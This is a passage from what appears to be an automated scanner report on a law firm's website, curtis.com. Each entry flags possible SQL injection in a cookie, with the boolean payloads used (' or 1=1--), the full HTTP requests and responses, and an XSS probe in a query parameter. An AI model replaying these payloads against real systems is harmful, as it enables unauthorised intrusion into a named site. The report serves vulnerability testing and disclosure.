   background-color: #FFF;
   margin-left: 0px;
   margin-top: 10px;
   margin-right: 0px;
   margin-bottom: 10px;
}
--
...[SNIP]...

1.11. http://www.curtis.com/emaildisclaimer.cfm [__utma cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.curtis.com
Path:   /emaildisclaimer.cfm

Issue detail

The __utma cookie appears to be vulnerable to SQL injection attacks. The payloads 60403110'%20or%201%3d1--%20 and 60403110'%20or%201%3d2--%20 were each submitted in the __utma cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /emaildisclaimer.cfm?itemID=%22%20onmouseover%3dprompt%28937974%29%20bad%3d%22&itemname=Curtis,%20Mallet-Prevost,%20Colt%20%26%20Mosle%20LLP.&itemType=1 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.160403110'%20or%201%3d1--%20; __utmc=126702367; __utmb=126702367.6.10.1303145803; CFID=6175843; CFTOKEN=32575697

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Mon, 18 Apr 2011 17:06:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: __UTMA=;expires=Sun, 18-Apr-2010 17:06:19 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /emaildisclaimer.cfm?itemID=%22%20onmouseover%3dprompt%28937974%29%20bad%3d%22&itemname=Curtis,%20Mallet-Prevost,%20Colt%20%26%20Mosle%20LLP.&itemType=1 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.160403110'%20or%201%3d2--%20; __utmc=126702367; __utmb=126702367.6.10.1303145803; CFID=6175843; CFTOKEN=32575697

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:06:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Email Disclaimer</title>
<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<style type="text/css">
<!--
body,td,th {
   font-family: Verdana, Arial, Helvetica, sans-serif;
   color: #000000;
   line-height: 1.4em;
   font-size: 8pt;
}
body {
   background-color: #FFF;
   margin: 20px;
}

-->
</style>
</head>

<body>
<table width="460" border="0" align="center" cellpadding="0" cellspacing="0" bgcolor="#FFFFFF">
<tr>
<td valign="top" style="padding: 20px; text-align:justify;">
<p>We value your interest in Curtis, Mallet-Prevost, Colt & Mosle LLP and any communications prompted by your viewing of our website. It is important to us that you understand that transmitting information to us by e-mail does not establish any attorney-client or confidential relationship with us. An attorney-client relationship, and an obligation for the Firm to maintain your communications in confidence, can be created only after proper checks for potential conflicts with current clients are conducted and an agreement of representation is reached. Any information provided to us without such a prior agreement may waive legal privileges that you might otherwise have. In addition, in the absence of such an agreement, the Firm will be entitled to utilize such information on behalf of existing or future clients who may be adverse to your interests. For that reason, please refrain from sending the Firm confidential information through e-mail. Thank you for your interest in Cu
...[SNIP]...

1.12. http://www.curtis.com/emaildisclaimer.cfm [__utmb cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.curtis.com
Path:   /emaildisclaimer.cfm

Issue detail

The __utmb cookie appears to be vulnerable to SQL injection attacks. The payloads 21125157'%20or%201%3d1--%20 and 21125157'%20or%201%3d2--%20 were each submitted in the __utmb cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /emaildisclaimer.cfm?itemID=%22%20onmouseover%3dprompt%28937974%29%20bad%3d%22&itemname=Curtis,%20Mallet-Prevost,%20Colt%20%26%20Mosle%20LLP.&itemType=1 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.6.10.130314580321125157'%20or%201%3d1--%20; CFID=6175843; CFTOKEN=32575697

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Mon, 18 Apr 2011 17:06:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: __UTMB=;expires=Sun, 18-Apr-2010 17:06:31 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /emaildisclaimer.cfm?itemID=%22%20onmouseover%3dprompt%28937974%29%20bad%3d%22&itemname=Curtis,%20Mallet-Prevost,%20Colt%20%26%20Mosle%20LLP.&itemType=1 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.6.10.130314580321125157'%20or%201%3d2--%20; CFID=6175843; CFTOKEN=32575697

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:06:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Email Disclaimer</title>
<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<style type="text/css">
<!--
body,td,th {
   font-family: Verdana, Arial, Helvetica, sans-serif;
   color: #000000;
   line-height: 1.4em;
   font-size: 8pt;
}
body {
   background-color: #FFF;
   margin: 20px;
}

-->
</style>
</head>

<body>
<table width="460" border="0" align="center" cellpadding="0" cellspacing="0" bgcolor="#FFFFFF">
<tr>
<td valign="top" style="padding: 20px; text-align:justify;">
<p>We value your interest in Curtis, Mallet-Prevost, Colt & Mosle LLP and any communications prompted by your viewing of our website. It is important to us that you understand that transmitting information to us by e-mail does not establish any attorney-client or confidential relationship with us. An attorney-client relationship, and an obligation for the Firm to maintain your communications in confidence, can be created only after proper checks for potential conflicts with current clients are conducted and an agreement of representation is reached. Any information provided to us without such a prior agreement may waive legal privileges that you might otherwise have. In addition, in the absence of such an agreement, the Firm will be entitled to utilize such information on behalf of existing or future clients who may be adverse to your interests. For that reason, please refrain from sending the Firm confidential information through e-mail. Thank you for your interest in Cu
...[SNIP]...

1.13. http://www.curtis.com/emaildisclaimer.cfm [__utmc cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.curtis.com
Path:   /emaildisclaimer.cfm

Issue detail

The __utmc cookie appears to be vulnerable to SQL injection attacks. The payloads 14813370%20or%201%3d1--%20 and 14813370%20or%201%3d2--%20 were each submitted in the __utmc cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /emaildisclaimer.cfm?itemID=%22%20onmouseover%3dprompt%28937974%29%20bad%3d%22&itemname=Curtis,%20Mallet-Prevost,%20Colt%20%26%20Mosle%20LLP.&itemType=1 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=12670236714813370%20or%201%3d1--%20; __utmb=126702367.6.10.1303145803; CFID=6175843; CFTOKEN=32575697

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Mon, 18 Apr 2011 17:06:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: __UTMC=;expires=Sun, 18-Apr-2010 17:06:25 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /emaildisclaimer.cfm?itemID=%22%20onmouseover%3dprompt%28937974%29%20bad%3d%22&itemname=Curtis,%20Mallet-Prevost,%20Colt%20%26%20Mosle%20LLP.&itemType=1 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=12670236714813370%20or%201%3d2--%20; __utmb=126702367.6.10.1303145803; CFID=6175843; CFTOKEN=32575697

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:06:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Email Disclaimer</title>
<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<style type="text/css">
<!--
body,td,th {
   font-family: Verdana, Arial, Helvetica, sans-serif;
   color: #000000;
   line-height: 1.4em;
   font-size: 8pt;
}
body {
   background-color: #FFF;
   margin: 20px;
}

-->
</style>
</head>

<body>
<table width="460" border="0" align="center" cellpadding="0" cellspacing="0" bgcolor="#FFFFFF">
<tr>
<td valign="top" style="padding: 20px; text-align:justify;">
<p>We value your interest in Curtis, Mallet-Prevost, Colt & Mosle LLP and any communications prompted by your viewing of our website. It is important to us that you understand that transmitting information to us by e-mail does not establish any attorney-client or confidential relationship with us. An attorney-client relationship, and an obligation for the Firm to maintain your communications in confidence, can be created only after proper checks for potential conflicts with current clients are conducted and an agreement of representation is reached. Any information provided to us without such a prior agreement may waive legal privileges that you might otherwise have. In addition, in the absence of such an agreement, the Firm will be entitled to utilize such information on behalf of existing or future clients who may be adverse to your interests. For that reason, please refrain from sending the Firm confidential information through e-mail. Thank you for your interest in Cu
...[SNIP]...

1.14. http://www.curtis.com/emaildisclaimer.cfm [__utmz cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.curtis.com
Path:   /emaildisclaimer.cfm

Issue detail

The __utmz cookie appears to be vulnerable to SQL injection attacks. The payloads 16707661'%20or%201%3d1--%20 and 16707661'%20or%201%3d2--%20 were each submitted in the __utmz cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /emaildisclaimer.cfm?itemID=%22%20onmouseover%3dprompt%28937974%29%20bad%3d%22&itemname=Curtis,%20Mallet-Prevost,%20Colt%20%26%20Mosle%20LLP.&itemType=1 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)16707661'%20or%201%3d1--%20; __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.6.10.1303145803; CFID=6175843; CFTOKEN=32575697

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Mon, 18 Apr 2011 17:06:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: __UTMZ=;expires=Sun, 18-Apr-2010 17:06:14 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /emaildisclaimer.cfm?itemID=%22%20onmouseover%3dprompt%28937974%29%20bad%3d%22&itemname=Curtis,%20Mallet-Prevost,%20Colt%20%26%20Mosle%20LLP.&itemType=1 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)16707661'%20or%201%3d2--%20; __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.6.10.1303145803; CFID=6175843; CFTOKEN=32575697

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:06:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Email Disclaimer</title>
<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<style type="text/css">
<!--
body,td,th {
   font-family: Verdana, Arial, Helvetica, sans-serif;
   color: #000000;
   line-height: 1.4em;
   font-size: 8pt;
}
body {
   background-color: #FFF;
   margin: 20px;
}

-->
</style>
</head>

<body>
<table width="460" border="0" align="center" cellpadding="0" cellspacing="0" bgcolor="#FFFFFF">
<tr>
<td valign="top" style="padding: 20px; text-align:justify;">
<p>We value your interest in Curtis, Mallet-Prevost, Colt & Mosle LLP and any communications prompted by your viewing of our website. It is important to us that you understand that transmitting information to us by e-mail does not establish any attorney-client or confidential relationship with us. An attorney-client relationship, and an obligation for the Firm to maintain your communications in confidence, can be created only after proper checks for potential conflicts with current clients are conducted and an agreement of representation is reached. Any information provided to us without such a prior agreement may waive legal privileges that you might otherwise have. In addition, in the absence of such an agreement, the Firm will be entitled to utilize such information on behalf of existing or future clients who may be adverse to your interests. For that reason, please refrain from sending the Firm confidential information through e-mail. Thank you for your interest in Cu
...[SNIP]...

1.15. http://www.curtis.com/emaildisclaimer.cfm [sifrFetch cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.curtis.com
Path:   /emaildisclaimer.cfm

Issue detail

The sifrFetch cookie appears to be vulnerable to SQL injection attacks. The payloads 12161945'%20or%201%3d1--%20 and 12161945'%20or%201%3d2--%20 were each submitted in the sifrFetch cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /emaildisclaimer.cfm?itemID=%22%20onmouseover%3dprompt%28937974%29%20bad%3d%22&itemname=Curtis,%20Mallet-Prevost,%20Colt%20%26%20Mosle%20LLP.&itemType=1 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true12161945'%20or%201%3d1--%20; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.6.10.1303145803; CFID=6175843; CFTOKEN=32575697

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Mon, 18 Apr 2011 17:06:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: SIFRFETCH=;expires=Sun, 18-Apr-2010 17:06:07 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /emaildisclaimer.cfm?itemID=%22%20onmouseover%3dprompt%28937974%29%20bad%3d%22&itemname=Curtis,%20Mallet-Prevost,%20Colt%20%26%20Mosle%20LLP.&itemType=1 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true12161945'%20or%201%3d2--%20; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.6.10.1303145803; CFID=6175843; CFTOKEN=32575697

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:06:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Email Disclaimer</title>
<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<style type="text/css">
<!--
body,td,th {
   font-family: Verdana, Arial, Helvetica, sans-serif;
   color: #000000;
   line-height: 1.4em;
   font-size: 8pt;
}
body {
   background-color: #FFF;
   margin: 20px;
}

-->
</style>
</head>

<body>
<table width="460" border="0" align="center" cellpadding="0" cellspacing="0" bgcolor="#FFFFFF">
<tr>
<td valign="top" style="padding: 20px; text-align:justify;">
<p>We value your interest in Curtis, Mallet-Prevost, Colt & Mosle LLP and any communications prompted by your viewing of our website. It is important to us that you understand that transmitting information to us by e-mail does not establish any attorney-client or confidential relationship with us. An attorney-client relationship, and an obligation for the Firm to maintain your communications in confidence, can be created only after proper checks for potential conflicts with current clients are conducted and an agreement of representation is reached. Any information provided to us without such a prior agreement may waive legal privileges that you might otherwise have. In addition, in the absence of such an agreement, the Firm will be entitled to utilize such information on behalf of existing or future clients who may be adverse to your interests. For that reason, please refrain from sending the Firm confidential information through e-mail. Thank you for your interest in Cu
...[SNIP]...

1.16. http://www.curtis.com/favicon.ico [CFID cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.curtis.com
Path:   /favicon.ico

Issue detail

The CFID cookie appears to be vulnerable to SQL injection attacks. The payloads 61658724%20or%201%3d1--%20 and 61658724%20or%201%3d2--%20 were each submitted in the CFID cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /favicon.ico HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=617584361658724%20or%201%3d1--%20; CFTOKEN=32575697; __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.2.10.1303145803

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Mon, 18 Apr 2011 17:00:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=;expires=Sun, 18-Apr-2010 17:00:51 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /favicon.ico HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=617584361658724%20or%201%3d2--%20; CFTOKEN=32575697; __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.2.10.1303145803

Response 2 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:00:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175919;path=/
Set-Cookie: CFTOKEN=56500703;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">

<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link href="/sifr3/sifr3.css" rel="stylesheet" type="text/css" />

<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>

<!--::staticcontent::-->

<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.forms["attorneysearch"].firstlastname.v
...[SNIP]...

1.17. http://www.curtis.com/favicon.ico [CFTOKEN cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.curtis.com
Path:   /favicon.ico

Issue detail

The CFTOKEN cookie appears to be vulnerable to SQL injection attacks. The payloads 57319298%20or%201%3d1--%20 and 57319298%20or%201%3d2--%20 were each submitted in the CFTOKEN cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /favicon.ico HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=6175843; CFTOKEN=3257569757319298%20or%201%3d1--%20; __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.2.10.1303145803

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Mon, 18 Apr 2011 17:01:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFTOKEN=;expires=Sun, 18-Apr-2010 17:01:01 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /favicon.ico HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=6175843; CFTOKEN=3257569757319298%20or%201%3d2--%20; __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.2.10.1303145803

Response 2 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:01:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175943;path=/
Set-Cookie: CFTOKEN=60929706;path=/
Content-Type: text/html; charset=UTF-8


